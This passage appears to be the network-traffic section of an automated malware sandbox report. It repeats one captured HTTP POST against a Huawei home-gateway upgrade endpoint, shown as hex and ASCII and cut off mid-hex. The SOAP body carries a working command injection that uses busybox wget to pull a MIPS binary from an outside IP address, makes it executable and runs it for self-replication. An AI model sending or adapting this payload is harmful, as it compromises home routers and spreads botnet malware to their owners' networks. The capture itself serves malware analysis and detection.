68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 